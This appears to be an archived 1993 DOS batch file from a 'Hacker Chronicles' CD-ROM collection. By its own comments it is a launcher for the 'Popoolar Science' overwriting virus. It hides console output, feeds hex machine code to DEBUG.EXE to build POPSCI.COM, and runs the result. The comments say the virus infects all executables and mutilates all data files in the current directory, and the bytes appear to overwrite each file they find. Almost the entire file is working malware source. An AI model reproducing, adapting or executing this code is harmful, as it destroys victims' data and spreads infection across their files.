home *** CD-ROM | disk | FTP | other *** search
/ Hacker Chronicles 2 / HACKER2.BIN / 290.POPSCI.BAT < prev    next >
DOS Batch File  |  1993-01-05  |  1KB  |  34 lines

  1. @echo off
  2. rem POPSCI.BAT will function correctly on machines employing MS-DOS 5.0
  3. rem in its default installation. That is, the program DEBUG.EXE must be
  4. rem in the DOS directory, which is where it normally is for anyone who
  5. rem has installed version 5.0 in the normal, hands-off, idiot proof fashion.
  6. rem POPSCI.BAT is a launcher for the POPOOLAR SCIENCE overwriting virus.
  7. rem Executing the file will create the virus in the current directory and
  8. rem call it. The virus will infect all executables in the current directory
  9. rem and mutilate all data files. If the program terminates without error and
  10. rem the virus has infected all files, the message "Popoolar Science Roolz"
  11. rem is displayed.
  12.  
  13. SET PATH=C:\DOS
  14. CTTY NUL
  15. DEBUG <popsci.bat
  16. N POPSCI.COM
  17. E 0100 E9 00 00 0E 1F BA 79 01 B4 09 CD 21 BA 75 01 E8 
  18. E 0110 05 00 B8 00 4C CD 21 55 B4 2F CD 21 53 89 E5 81 
  19. E 0120 EC 80 00 52 B4 1A 8D 56 80 CD 21 B4 4E B9 27 00 
  20. E 0130 5A CD 21 72 07 E8 0D 00 B4 4F EB F5 89 EC B4 1A 
  21. E 0140 5A CD 21 5D C3 B4 2F CD 21 89 DE B8 01 43 33 C9 
  22. E 0150 8D 54 1E CD 21 B8 02 3D CD 21 93 B4 40 B9 91 00 
  23. E 0160 BA 00 01 CD 21 B8 01 57 8B 4C 16 8B 54 18 CD 21 
  24. E 0170 B4 3E CD 21 C3 2A 2E 2A 00 50 6F 70 6F 6F 4C 61 
  25. E 0180 72 20 53 63 49 65 6E 63 45 20 52 6F 6F 6C 5A 21 
  26. E 0190 24 
  27. RCX
  28. 0091
  29. W
  30. Q
  31. CTTY CON
  32. POPSCI
  33.  
  34.